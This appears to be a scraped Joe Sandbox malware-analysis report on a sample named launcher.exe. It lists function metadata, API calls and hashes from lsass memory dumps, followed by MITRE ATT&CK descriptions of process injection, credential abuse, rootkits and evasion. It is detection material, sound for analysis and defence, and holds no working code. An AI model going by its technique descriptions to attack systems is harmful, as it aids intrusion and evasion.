API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction ID: 7bc60fbf3041ea12c94ec44b93424097bb84f44d27d4ee1257bc4679ac37d989
Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction Fuzzy Hash: 28112E30613F4186FE54BB35AC4C729F2926BC8BE2F548626D9AB477D5DF2EC842C600

Function 00000264CDEC3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000264CDEC3886
GetCurrentProcess.KERNEL32 ref: 00000264CDEC38B4
VirtualProtectEx.KERNEL32 ref: 00000264CDEC38D6
GetCurrentProcess.KERNEL32 ref: 00000264CDEC38F4
VirtualProtectEx.KERNEL32 ref: 00000264CDEC3915

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: bb4285746288f8543f66204cee6e0c64a388fd39672310b5de23c9342f924d91
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 11110C3A706F4182EB24AB51F408269B6A4F789B85F04412ADECD077D4EF3EC545C704

Function 00000264CD7C84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000264CD7C8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000264CD7C8598

Strings

f, xrefs: 00000264CD7C8516
csm, xrefs: 00000264CD7C857E

Memory Dump Source

Source File: 0000001C.00000002.3740227777.00000264CD7C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CD7C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cd7c0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 49f70d42c2272d7d4cee933bce45428c75a9810256af16df01304e68af54c0f7
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 2651DF323136008FEB14FF25E848B59B7A5F3C0B98F918126DA9A577C9EB76D841E704

Function 00000264CD7C84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000264CD7C8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000264CD7C8598

Strings

f, xrefs: 00000264CD7C8516
csm, xrefs: 00000264CD7C857E

Memory Dump Source

Source File: 0000001C.00000002.3740227777.00000264CD7C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CD7C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cd7c0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 4a234f7ac34f6cd273669a27a1096bbb45221afc95a156a144c1c82d4248a715
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: B831AE722136408AE714FF11E848B5AB7A8F780BD8F15801AAEDB077C5CB7AC941D708

Function 00000264CDEC26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000264CDEC27D4
StrCpyW.SHLWAPI ref: 00000264CDEC27ED

Strings

\\.\pipe\, xrefs: 00000264CDEC27DF

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: d471f9300ffcd06be461992a35a86ed60ab4eb7c42ddc4ef719c3234bff06014
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: AE719D32206F8186EA78AB2999483EEF6A0F7C5B85F444017DECA47BD9DE36C604C740

Function 00000264CDEC24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000264CDEC25C3
StrCpyW.SHLWAPI ref: 00000264CDEC25DA

Strings

\\.\pipe\, xrefs: 00000264CDEC25CE

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: f5de587dec15ccd5280dc03266e625a2ad991d8b20fbc72609ad78c1dd90cedb
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: B551913220AF8182EA64BA29A55C3ABF651F7C5781F954127DACA03BD9DA3BC405CB50

Function 00000264CDED0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000264CDED071B
GetLastError.KERNEL32 ref: 00000264CDED073D

Strings

U, xrefs: 00000264CDED06C7

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 01d6f8666b2f4757bf36b969e4a01d327625ef6b137585df370f7b6e129b0e89
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: F441C872716E4085EB20EF25E44939AB7A1F788794F844026EE8E87BD8DF7DC541CB50

Function 00000264CDE70604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000264CDE7071B
GetLastError.KERNEL32 ref: 00000264CDE7073D

Strings

U, xrefs: 00000264CDE706C7

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 1b72eb8634ffa365efee313212d78d65f57e38b85527cb459f56c54f72e3d82f
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 0A41D672316E8081EBA0EF65E45939AF7A0F398794F814026EE8D87B84DB3DC441CB50

Function 00000264CDECD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000264CDECD6F9
LCMapStringW.KERNEL32 ref: 00000264CDECD781

Strings

LCMapStringEx, xrefs: 00000264CDECD6DC, 00000264CDECD6ED

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: ea23ddfe51d13913399ef0762080be113c918cb4b025aadc5ef21778abc51776
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: D1111736608B8086D760DB56F88429AF7A4F7C9B90F54412AEECE83B99DF39C450CB00

Function 00000264CDE6D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000264CDE6D6F9
LCMapStringW.KERNEL32 ref: 00000264CDE6D781

Strings

LCMapStringEx, xrefs: 00000264CDE6D6DC, 00000264CDE6D6ED

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: a72b1bc684b2d2522bdf7a84e2d3910cafe794391c81072e5eb41a87d210f50b
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: E7110636608B8086D7A0DB16B88429AB7A4F7D9B90F54412AEEDD83B99DF38C451CB00

Function 00000264CDEC94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000264CDEC94E8
RaiseException.KERNEL32 ref: 00000264CDEC952E

Strings

csm, xrefs: 00000264CDEC951B

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: b7719d72b9590881469d51e30384c347c5d6e6b06a5257f1d4ba552de712cce1
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 8D114C32209F8082EB619F15E944259B7A0F788B99F184222DFDE07BA8DF39C551CB00

Function 00000264CDECD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000264CDECD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000264CDECD6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000264CDECD681

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 82fc06a19eac20a0a85dbbd796b173f1f6c27b6a7fd7061cdca7c03334e396d2
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 57F08231712F9092E715BB45F448695F321ABC8B90F98512BE9DE03B94CF3BC995C700

Function 00000264CDE6D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000264CDE6D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000264CDE6D6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000264CDE6D681

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: a29937184710bf4d02c8c85bb07348dbce38d955ac13d2290a4521f2df6af458
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: C6F0A731712F8491E795BB51F848699F321EB88B90F895127EED903BD4CF3AC995DB00

Function 00000264CD7CCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000264CD7CCBC5

Strings

October, xrefs: 00000264CD7CCBBE
November, xrefs: 00000264CD7CCBA8, 00000264CD7CCBB2

Memory Dump Source

Source File: 0000001C.00000002.3740227777.00000264CD7C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CD7C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cd7c0000_lsass.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 72f7e628143c31f7788c87f9c061ae173f4a4d3ce9cc4cd0a4e6f6ab70a89d87
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: E8E0D83260354196FB04BB59F44C2E523619BC4748F5950279ADA063D6CF3FC8A6F300

Function 00000264CDECD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000264CDECD631
TlsSetValue.KERNEL32 ref: 00000264CDECD648

Strings

FlsSetValue, xrefs: 00000264CDECD61E

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 0d6155a3ba36a4a885ee1ce9157de2504ca220d4fae6093dded7272ed60e9c08
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 26E01271212E4092FB09BB55F84D795F322BBC8781F989127E99A0A3D5CF3BC895C710

Function 00000264CDE6D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000264CDE6D631
TlsSetValue.KERNEL32 ref: 00000264CDE6D648

Strings

FlsSetValue, xrefs: 00000264CDE6D61E

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: f9aabed2b308ff2ab065e2d362f04dbcb42327e098a504cf4006729d188595d3
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 31E09B71302E44D1EB857B50FC0D698F321BB98780F898127D6D9063D5CE3AC895C700

Function 00000264CDEC1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000264CDEC1D9B
HeapAlloc.KERNEL32 ref: 00000264CDEC1DAA
GetProcessHeap.KERNEL32 ref: 00000264CDEC1E1E
HeapFree.KERNEL32 ref: 00000264CDEC1E2C

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: bd6d13fa140ada2cbf5905a023820d3c950cd06d5b505ca16771b627ddcee903
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: BF21A432606F8086EB119F59E40825AF7A0FBC8B95F554112EECD87BA5FF79C542C700

Function 00000264CDEC1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000264CDEC127A
HeapAlloc.KERNEL32 ref: 00000264CDEC1289
GetProcessHeap.KERNEL32 ref: 00000264CDEC12A3
HeapAlloc.KERNEL32 ref: 00000264CDEC12B4

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 3c535caa5832230e50960c1b42f50c5e06969f5388087e36801d48c5af7dd549
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 88E012B1612A01C6E704AF66D818359B6E1FB8DF51F49C025C98A07390DF7E84D9C750

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report launcher.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

